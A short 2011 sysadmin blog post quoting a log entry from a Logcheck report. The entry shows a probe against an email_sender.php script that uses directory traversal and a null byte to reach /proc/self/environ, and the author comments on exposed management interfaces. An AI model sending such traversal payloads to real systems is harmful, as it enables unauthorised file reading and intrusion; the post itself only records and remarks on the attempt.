start > spam > VMware Server Vulnerable To Mail Relaying Attack?

VMware Server Vulnerable To Mail Relaying Attack?

Created by dave. Last edited by dave, 12 years and 5 days ago. Viewed 1,794 times. #1

[edit] [rdf]

labels

attachments

(3 December 2011)

Interesting, from this morning Logcheck report:

/space/VMware/Server/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst&spo_f_email[0]=sample@email.tst&spo_message=20&spo_msg_ftr=This%20contact%20message%20was%20generated%20using%20Simple%20Page%20Options%20Module%20from%20SITEURL.&spo_send_type=&spo_site_lang=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP Response 302

Never see that before. Probably mostly because I'm not running VMware Server (well, not here at least). However I would never have thought exposing VMware Server management interfaces to the raw internet was ever going to be a good idea.

no comments | post comment

see also:
The War On Email	snipsnap-index	Growing iSCSI	SCSI types
Netscreen	Juniper	Assign Unowned ...	panic - ...
spam	iSCSI IP ...	running eve...	Clustering
vCenter Convert...	Templating...	HotWheels	Smart Host
Sysadmin Jeopardy	Secondary IP Ad...	NTP Configuration	GUI-less Windows Serve...

VMware Server Vulnerable To Mail Relaying Attack?

Virtual Dave Megaplex:

Useful: